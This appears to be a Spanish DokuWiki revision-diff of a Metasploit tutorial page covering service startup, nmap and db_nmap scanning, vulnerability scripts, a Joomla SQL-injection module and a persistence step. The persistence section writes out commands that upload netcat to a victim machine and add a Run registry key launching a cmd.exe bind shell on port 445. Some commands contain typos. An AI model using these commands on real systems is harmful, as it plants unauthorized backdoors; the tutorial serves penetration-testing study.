meta data de esta página
  •  

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión
Revisión previa
aplicaciones:metasploit [2019/03/15 09:59] – [Conceptos] lcaplicaciones:metasploit [2023/01/18 14:10] (actual) – editor externo 127.0.0.1
Línea 4: Línea 4:
  
 Una vez instalado,  o si hemos usando una distribución de seguridad como Kali Linux, lo primero que tenemos que hacer es arrancar los servicios necesarios para el correcto funcionamiento del Metasploit Framework.  Una vez instalado,  o si hemos usando una distribución de seguridad como Kali Linux, lo primero que tenemos que hacer es arrancar los servicios necesarios para el correcto funcionamiento del Metasploit Framework. 
 +
 +<note>Si queremos utilizar el entorno gráfico de Metasploit, debemos ejecutar Armitage </note>
  
 En especial debemos arrancar las bases de de datos (msdb y postgresql) En especial debemos arrancar las bases de de datos (msdb y postgresql)
Línea 44: Línea 46:
 Para ver el número total de cada uno Para ver el número total de cada uno
  <sxh>banner</sxh>  <sxh>banner</sxh>
- 
- 
  
  
 ===== Recopilar información ===== ===== Recopilar información =====
-Metasploit tiene varios escaneres integrados+Metasploit tiene varios escaneres integrados, podemos ver los que tiene integrados ejecutando  
- +<sxh>seach portscan</sxh> 
-Para ver los que hay ejecutar <sxh>seacrh portscan</sxh> +Por ejemplo podemos usar nmap para escanear un equipo 
-Por ejemplo podemos usar nmmp para escanear un equipo con +
 <sxh>nmap -ss -Pn xxx.xxx.xxx.xxx</sxh>  <sxh>nmap -ss -Pn xxx.xxx.xxx.xxx</sxh> 
-también podemos usar <sxh>db_nmap -sS -Pn xxx.xxx.xxx.xxx</sxh> en especial si queremos manipular los resultados que nos muestre el nmap. 
- 
-Para buscar máquinas vulnerables  
-<sxh>db_nmap -sS -Pn --script vuln xxx.xxx.xxx.xxx>/sxh> 
  
 +también podemos usar **db_nmap** en especial si queremos manipular los resultados que nos muestre el nmap. 
 +<sxh>db_nmap -sS -Pn xxx.xxx.xxx.xxx</sxh> 
  
 +=== Buscar máquinas vulnerables ===
 +Podemos usar metasploit para hacer un escaneo de máquinas vulnerables . Para ello ponemos la opción **--script vuln**  a nuestro db_nmap
 +<sxh>db_nmap -sS -Pn --script vuln xxx.xxx.xxx.xxx</sxh>
  
-Podemos hacer uso de otros escaner específicos, con el comando use y el escaner a utilizar+También podemos hacer uso de otros escaner específicos, con el comando use y el escaner a utilizar
 Por ejemplo <sxh>use auxiliary/gather/joomla_weblinks_sqli </sxh> Por ejemplo <sxh>use auxiliary/gather/joomla_weblinks_sqli </sxh>
-<note> con options vemos que parámetros hay que establecery cuales tiene configurado por defecto</note>+ 
 +<note> con options vemos que parámetros hay que establecer y cuales tiene configurado por defecto cada módulo</note>
  
 ==== Escalada de privilegios ==== ==== Escalada de privilegios ====
Línea 70: Línea 71:
  
 ==== Persistencia ==== ==== Persistencia ====
-a la máquina victima le subimos una copia del netcat +Una vez obtenido el control, tenemos que realizar acciones que nos permitan mantener dicho control en el tiempo. 
-<sxh>upload nc.exe c:\windows\system32</sxh> + 
-le creamos una clave en el registro para que arranque netcat automáticamente  <sxh>reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\run -v nc -d 'c:\windows\system32\nc.exe -Ldp445 -e cmd.exe</sxh>+Un ejemplo para mantener el control en una máquina windows sería: 
 +  - a la máquina víctima le subimos una copia del netcat <sxh>upload nc.exe c:\windows\system32</sxh> 
 +  le creamos una clave en el registro para que arranque netcat automáticamente  <sxh>reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\run -v nc -d 'c:\windows\system32\nc.exe -Ldp445 -e cmd.exe</sxh>